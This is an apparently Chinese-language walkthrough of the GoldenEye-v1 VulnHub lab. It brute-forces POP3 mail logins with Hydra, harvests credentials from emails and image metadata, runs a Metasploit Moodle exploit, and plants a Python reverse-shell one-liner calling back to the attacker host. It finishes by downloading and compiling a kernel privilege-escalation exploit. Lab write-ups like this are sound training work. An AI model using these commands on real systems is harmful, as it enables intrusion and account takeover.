远赴人间今鸿雁。一睹人间盛世言。

GoldenEye-v1

环境:
vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/
kali主机:192.168.231.138
GoldenEye-v1靶机:192.168.231.143

提示:以下是本篇文章正文内容,下面案例可供参考,

一,信息收集:

1、获取对应的靶机IP:

扫描IP地址 确定IP地址 IP:192.168.231.143
命令:nmap -sP 192.168.231.0/24

2,获取靶机端口、操作系统版本信息:

扫描IP查看打开端口信息

  • 在这里我们可以看到IP开发4个端口 /
  • 25 smtp端口服务 邮件传输协议 / open smtp(简单邮件传输服务)
  • 80 apache服务2.4.7 Ubuntu系统 / open http(超文本传输协议)
  • 55006/tcp ssl保密协议 /open ssl/pop3(pop3被用户代理用来邮件服务器取得邮件
  • 55007/tcp pop3服务 邮局协议 / open pop3
  • 我们直接在网站get输入IP地址 80 端口

    我们根据页面提示进去             网站已经提示 /ser-home/ 输入网站登陆界面

    也不知道密码 也没有办法登陆 我们先试一下弱密码吧 admin admin123 admin123456
    不过密码不对 , 可以看一下网页代码源 有没有我们需要的信息

    可以看到有两个文件 index.css 和 terminal.js
  • Index.css
  • terminal.js

    在index.css文件里面到是没有什么有用的 不过在terminal.js文件里面结果我们翻译发现有两个名字
    鲍里斯 Boris
    娜塔莉亚 Natalya
    在这注释里面我们从这两个人的对话中间可以得到
    密码InvincibleHack3&#114 因为这编码方式是html编码 我们用Burp进行解码 解码原文为 InvincibleHack3r
    我们用这个两个人名做账号 可以试一试可不可以登陆进去
    账号:Boris /InvincibleHack3r Natalya/lnvincibleHack3r 试一下登陆失败 我想起来这个是Ubuntu系统 大小写敏感 我们试一下小写
    最后密码为boris /InvincibleHack3r

    登陆成功,这页面没有什么其他,我们还是查看一下页面代码源吧,我们在代码源最低部发现了一句话

    里面提到了 合格的黄金眼网络运营商主管: Natalya ,Boris 这两个人名 我们之前登陆也是使用的这两个名字 ,在之前端口扫描的时间扫描到了 55007 邮件协议 而看到这页面想起来是否可以爆破邮箱
    试一下吧
    Echo -e “natalya\boris” > user.txt
    Hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.231.143 -s 55007 pop3

    [55007][pop3] host: 192.168.231.143 login: natalya password: bird
    [55007][pop3] host: 192.168.231.143 login: boris password: secret1!
    账号 natalya 密码: bird 账号:boris 密码: secret1!
    我们登陆邮箱查看一下 使用nc登陆 在这里要说一下pop3的命令
#### POP3 命令包括
USER username 认证用户名
PASS password 认证密码认证,认证通过则状态转换
APOP name,digest 认可一种安全传输口令的办法,执行成功导致状态转换,请参见 RFC 1321 。
STAT 处理请求 server 回送邮箱统计资料,如邮件数、 邮件总字节数
UIDL n 处理 server 返回用于该指定邮件的唯一标识, 如果没有指定,返回所有的。
LIST n 处理 server 返回指定邮件的大小等
RETR n 处理 server 返回邮件的全部文本
DELE n 处理 server 标记删除,QUIT 命令执行时才真正删除
RSET 处理撤消所有的 DELE 命令
TOP n,m 处理 返回 n 号邮件的前 m 行内容,m 必须是自然数
NOOP 处理 server 返回一个肯定的响应
QUIT 希望结束会话。如果 server 处于"处理" 状态,则现在进入"更新"状态,删除那些标记成删除的邮件。如果 server 处于"认可"状态,则结束会话时 server 不进入"更新"状态 。

我们在使用nc链接

第一份邮箱内容:
第二份邮箱内容:
用户名:xenia 密码:RCP90rulez! 域名:severnaya-station.com 网址:severnaya-station.com/gnocertdir 我们现根据邮件提示添加本地域名:severnaya-station.com


我们已经最大这用户名为 就可以去爆破去试一试
Echo doak > user.txt
Hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.231.143 -s 55007 pop3


[55007][pop3] host: 192.168.231.143 login: doak password: goat

二、查找漏洞、漏洞利用:

1、查看历史漏洞

先查看搭网址的软件信息得到:

我们发现这个博客是moodle2.2.3版本的,我们去百度什么搜索src 或者cve 看看这个版本在网站上面有没有已经曝光的漏洞

谷歌上面搜索

2 、获取shell

在msfconsole上面搜索exp
Search moodle
Use 1 选择exploit/multi/http/moodle_spelling_binary_rce

Shwo options
需要设置用户名和密码 我们使用 用户名:xenia 密码:RCP90rulez! 试一下
Set username xenia —设置用户名
Set password RCP90rulez! —设置密码
Set rhosts severnaya-station.com —设置:
Set targeturi /gnocertdir —设置目录: /gnocertdir
set payload cmd/unix/reverse —设置 payload:cmd/unix/reverse
Set lhost 192.168.231.138(需要本地IP)
exploit ----执行命令 错误://好像是提示创建会话失败 权限不大 寻找一下admin账号试一试 看看可不可以找到admin账号密码吧


还是先看看刚才爆破doak的邮箱吧 密码goat


可以看到 下面的账号和密码是severnaya-station.com/gnocertdir网站的登陆账号和密码 账号:dr_doak 密码:4England! 登陆之后我们发现在主页有一个私人文件 也不知道是什么,我们下载打开看看



也不知道这是什么 经过翻译之后的意思是说 /dir007key/for-007.jpg 这个地址的图片有趣 怎么有趣的法也不知道 我们打开这网站看看这图片吧先 这是个什么东西???
还是先下载下来分析分析照片吧 既然说了 就看看这照片的详细内容吧 在标题和主题的位置好像是编码 解码试一试 看看是什么吧 eFdpbnRlcjE5OTV4IQ== 解码等到的是
xWinter1995x! 结合上面下载的s3cret.txt 有可能是 账号admin 密码 xWinter1995x! 我们登陆网站看一下是不是admin密码





登陆成功 用admin账号 使用msfconsole 的moodle exp漏洞打一下试一下
Shwo options
需要设置用户名和密码 我们使用 用户名:xenia 密码:RCP90rulez! 试一下
Set username admin —设置用户名
Set password xWinter1995x! —设置密码
Set rhosts severnaya-station.com —设置:
Set targeturi /gnocertdir —设置目录: /gnocertdir
set payload cmd/unix/reverse —设置 payload:cmd/unix/reverse
Set lhost 192.168.231.138(需要本地IP)
exploit ----执行命令 错误//和之前一起,还是寻找其他办法吧

还是在网页上面找找漏洞吧 然在网页 Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editor 这位置 由于我们已经使用了管理员admin用户登录页面,需要在设置中修改:

Home / ► Site administration / ► Server / ► System paths

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.231.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Home / ► My profile / ► Blogs / ► Add a new entry 在这位置输入 , 执行命令

Kali nc 监听 nc -lvp 6666

获得了反弹shell,www-data权限的shell了 因为获得的权限无正常交互:
python -c ‘import pty; pty.spawn("/bin/bash")’ —将shell进行tty
uname -a # 查看权限

3,提升权限

然后在 网站谷歌 上面搜索这版本 提权


获得exp版本:37292.c可进行利用进行内核提权。 我们在kali自带exp搜索
Searchsploit 37292 —搜索kali本地的exp库中37292攻击脚本信息
Cp /usr/share/exploitdb/exploits/linux/local/37292.c /home 复制文件移动到—地址随意



然后吧 gedit 37292.c —文本打开 第143行将gcc改为cc —编写下

我们在37292.c 这文件所在位置python打开http服务 python3 -m http.server 8081 然后在我们反弹shell的主机下载这个文件 命令:wget http://192.168.231.139/37292.c


我们使用c语言编译这文件 cc -o exp 37292.c 编译37292.c 文件 然后 直接一些exp就可以了 在个exp一个执行权限 chmod +x exp

获得flag:568628e0d993b1973adc718237da6e93

vulnhub靶场{GoldenEye-v1靶场实战}相关推荐

  1. 红队渗透靶场之W1R3S靶场(超详细!)

    W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...

  2. 使用APMServ搭建DVWA靶场、sqli-labs靶场——超详细

    文章目录 前言 一.搭建环境(APMServ) 1.安装APMServ 2.配置MySQL数据库 ①管理msyql数据库 ②登录(默认密码为空) ③选择mysql数据库 ④执行sql语句 ⑤重启APM ...

  3. vulnhub之unknowndevice64-V1.0渗透实战

    vulnhub之unknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 ...

  4. vulnhub之CH4INRULZ渗透测试实战

    vulnhub之CH4INRULZ渗透测试实战 一.环境搭建 目标: 获取root权限,并获得flag 难度:中级 下载链接:https://download.vulnhub.com/ch4inrul ...

  5. vulnhub靶场GoldenEye靶场

    靶场信息: 地址:GoldenEye: 1 ~ VulnHub 发布日期:2018年5月4日 目标:得到root权限并且找到flag.txt 难度:中级(CTF) hint: Useful to he ...

  6. Hacker Fest: 2019-Walkthrough【VulnHub靶场】渗透测试实战系列3

    靶场地址:Hacker Fest: 2019 这个靶场在CTF中的等级是easy,作者也提供了一些线索,所以比较适合小伙伴们独立完成. 这个题目是两阶段flag标志获取,普通用户和root分别有fla ...

  7. 攻防靶场|Vulnstack2靶场之CS实战

    作者: 不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 简介 最近学点攻防,拿靶场练练手,大佬轻喷哈. 靶场简介: 红队实战系列,主要以真实企业环境为实例搭建 ...

  8. DC-1靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 环境搭建 1. 准备工具 渗透利器kali DC-1靶场机 2. 安装过程 二. 渗透过程 1. 信息收集 ①探测目标IP地址 ②探测目标IP开放端口 ③网页信息收集 2. 漏洞查找与利用 ...

  9. DC-3靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. web页面信息探测 二. 漏洞找查 1. joomscan 2. searchsploit 三. 漏洞利用 1. SQL注入 ...

  10. DC-5靶场下载及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. 页面信息探测 二. 渗透过程 1. 寻找包含文件的参数 2. Nginx日志文件包含 3. 反弹shell 4. Linux ...

最新文章

  1. java.sql.SQLException: Lock wait timeout exceeded
  2. python切片语法-Python切片详解
  3. 基于Linux的集群系统(八)--转
  4. python—web页面操作之3种等待方式
  5. pic10f220 c语言,PIC10F200 LED流水灯程序
  6. 【论文阅读】A Gentle Introduction to Graph Neural Networks [图神经网络入门](5)
  7. 开源服务器Tornado的初步了解
  8. python choice添加下拉框_自定义Django Form中choicefield下拉菜单选取数据库内容实例...
  9. .net如何引用该命名空间
  10. Pycharm中设置py文件头部注释信息
  11. ionic4 集成极光推送jpush
  12. Union/find--不相交集类(并查集)
  13. 【OpenCV】音符提取(形态学实例)
  14. eclipse jstl包_我的Java Web之路41 - JSTL初步使用
  15. FCC算法题--Validate US Telephone Numbers
  16. C++父类和子类同名函数及继承关系---多态
  17. 学习笔记(2):模拟登陆抽屉网(ajax)
  18. histogram函数 python_Python numpy.histogram函数方法的使用
  19. html 登录页面模板
  20. XDOJ-歌德巴赫猜想-35

热门文章

  1. RT1052的LPI2C配置
  2. 软件卸载清理工具IObit Uninstaller Pro 中文版的下载、安装与注册激活教程
  3. 关于tomcat点击startup.bat出现闪退,输入http://localhost:8080网页打不开的解决方法
  4. f2fs学习笔记 - 5. f2fs基本类图
  5. python编写米字格的步骤,word2013书法字帖的制作方法(包括口字格、田字格、田回格、九宫格和米字格)...
  6. VS编写简单的网游客户端
  7. 使用jQuery与后端进行数据传输代码示例
  8. 项目管理之产品交付1
  9. jsp写php一句话,asp,aspx,php,jsp下的一句话木马
  10. 【unity】分享一个2D小游戏的完整制作教程——涂鸦跳跃demo